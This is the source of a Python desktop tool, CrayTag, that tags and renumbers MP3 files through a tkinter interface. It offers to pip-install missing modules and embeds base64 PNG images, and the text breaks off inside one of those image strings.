CrayTag.pyw
|
class ver:
sion="2.1" # Version number of program. # ver.sion
"""
##############################
CrayTag.
##############################
Coded by: Dalton Overlin
##########################################################
Last Code Revision Date: May. 26th, 2020
##########################################################
This is freeware! FREEWARE!
So if someone asked you to pay for this program
then they are a crook and you've been scammed!
I am releasing this program for use at no cost.
I will not be giving anyone, any form
of authorization to sell this program (unmodified) for
a price. Just be aware of this, this code is open source
and is Freeware! Don't be tricked into paying for free software.
##########################################################
MIT License
-----------
Copyright (c) 2020 Dalton Overlin https://github.com/Dalton-Overlin/CrayTag
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
import os, sys, threading
def ravage():
try:
os._exit(0)
except:
print('Kraken Error!')
sys.exit("Kraken Error!")
def installer(x):
print(('\n'*2)+'This module: ( '+x+' ) is not installed.\n\nIf you type yes & press enter I will try and install it for you.\nIf not, just press enter and the program will exit.\nNote, here are two commands you can run to install the missing module.\n\n'+'python -m pip install '+x+'pip install '+x)
c=str(input())
if 'yes' in c.lower() or 'y' in c.lower():
vue=os.system('python -m pip install '+str(x))
if vue==0:
return
else:
print('\n\nThis module: ',str(x),' could not be automatically installed, please install it manually.')
input()
ravage()
else:
print('Exiting, Goodbye:)')
ravage()
sys.setrecursionlimit(100000)
try:
import random
except:
installer('random')
import random
try:
import string
except:
installer('string')
import string
try:
import tkinter
from tkinter import *
from tkinter import filedialog
from tkinter import PhotoImage
import tkinter.font as tkFont
import tkinter as tk
except:
installer('tkinter')
import tkinter
from tkinter import *
from tkinter import filedialog
from tkinter import PhotoImage
import tkinter.font as tkFont
import tkinter as tk
try:
import shutil
except:
installer('shutil')
import shutil
try:
import time
except:
installer('time')
import time
try:
import datetime
except:
installer('datetime')
import datetime
try:
import eyed3
except:
installer('eyed3')
import eyed3
try:
import tinytag
from tinytag import TinyTag
except:
installer('tinytag')
import tinytag
from tinytag import TinyTag
try:
from PIL import ImageTk, Image
except:
installer('pillow')
from PIL import ImageTk, Image
eyed3.log.setLevel("ERROR")
class dirTree:
A=os.getcwd()
B=os.getcwd()
def browse_button():
coo = filedialog.askdirectory(initialdir = dirTree.B)
if os.path.isdir(coo):
dirTree.B=str(coo)
return coo
def browseFile():
return filedialog.askopenfilename(initialdir = dirTree.A,title = "Select Image File",filetypes = (("jpeg files","*.jpg"),("all files","*.*")))
class ram:
NotifyMissingArtist=True # DONE
NotifyMissingCover=True # DONE
NotifyMissingAlbumName=True # DONE
RenumberFilenames=True # DONE
ResizeAlbumCoverSize=480,480 # DONE
ChangeAllGenres=False # DONE
GenreToChangeTo="Pop" # DONE
LiveFeedback="Initializing." # The GUI will pull live data from here.
files=0 # Number of mp3s tagged.
rt=None # The root holder for settings.
CoversToSearchFor=None # Filenames of covers to search for.
FilesToDelete=None # List of files to delete.
coffee=None # DONE
DontResiveJPG=False # DONE
WillEmbedArt=True # DONE
KeepBackup=True # DONE
DeleteEmbedded=True # DONE
KillThread=False # DONE
class maxx:
div=' ' # This can be anything like ' ', ' - ', etc. maxx.div
def reno(Input):
if type(Input)!=list:
print('Input must be list!')
return None
else:
if Input==[]:
print('Cant send empty list for sorting!')
if ram.RenumberFilenames==False:
return Input
newHold=[]
Input.sort()
for tv in Input: # This primes the data.
t=str(tv)
while t[0]==' ':
t=t[1:]
kpop=True
try:
if t[:2]=='NA' and t[2:3] in [' ','-','_','+','=','~','.']:
temp = str(t)
temp=temp.strip()
if temp[:2]=='NA':
temp=temp[2:]
temp=temp.strip()
if temp[0] in ['-','_','+','=','~','.']:
cake=str(temp)
nun=temp[0]
temp=temp[1:]
temp=temp.strip()
if temp=='':
temp=maxx.div+cake
else:
temp=maxx.div+temp
else:
temp=maxx.div+temp
newHold.append(temp)
elif t.replace(' ','')[0] in ['0','1', '2', '3', '4', '5', '6', '7', '8', '9']:
temp = str(t)
temp=temp.strip()
con=0
for v in temp:
if v in ['0','1', '2', '3', '4', '5', '6', '7', '8', '9']:
con+=1
else:
break
temp=temp[con:]
temp=temp.strip()
if temp[0] in ['-','_','+','=','~','.']:
cake=str(temp)
nun=temp[0]
temp=temp[1:]
temp=temp.strip()
if temp=='':
temp=maxx.div+cake
else:
temp=maxx.div+temp
else:
temp=maxx.div+temp
newHold.append(temp)
else:
temp = str(t)
temp=temp.strip()
if temp[0] in ['-','_','+','=','~','.']:
cake=str(temp)
nun=temp[0]
temp=temp[1:]
temp=temp.strip()
if temp=='':
temp=maxx.div+cake
else:
temp=maxx.div+temp
else:
temp=maxx.div+temp
newHold.append(temp)
except:
temp = str(t)
temp=temp.strip()
newHold.append(maxx.div+temp)
tim=len(str(len(newHold)))
if tim==1:
tim=2
cova=1
holder=[]
for t in newHold:
temp=str(cova)
while len(temp) != tim:
temp='0'+temp
holder.append(temp+t)
cova+=1
return holder
class ex:
tide = os.getcwd()
class img:
B="""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"""
C="""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